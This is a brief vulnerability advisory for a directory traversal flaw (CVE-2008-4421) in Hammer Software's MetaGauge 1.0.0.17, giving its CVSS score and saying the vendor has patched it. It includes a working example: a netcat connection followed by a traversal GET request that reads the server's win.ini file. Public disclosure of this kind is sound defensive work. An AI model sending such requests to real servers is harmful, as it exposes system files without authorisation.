7.8 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:C/I:N/A:N
Hammer Software MetaGauge 1.0.0.17 - Directory Traversal
Title: MetaGauge 1.0.0.17 Directory Traversal
-------------------------------------------------------------
Vendor: Hammer Software
Vendor URL: www.Hammer-Software.com
Vendor Response: Vendor has been notified and has since addressed the issue in the latest software release.
Description:
A directory traversal vulnerability exists in MetaGauge version 1.0.0.17 (and potentially below) which allows a remote user to view files local to the target server.
Example:
C:\> nc targethost 2004
GET /..\..\..\..\..\..\winnt\win.ini HTTP/1.1
Patch Information:
Hammer has addressed the issue in the latest version of MetaGauge:
http://dl.hammer-software.com/metagauge.zip
CVE: CVE-2008-4421
Credit:
Brad Antoniewicz
[email protected]
# milw0rm.com [2008-10-06]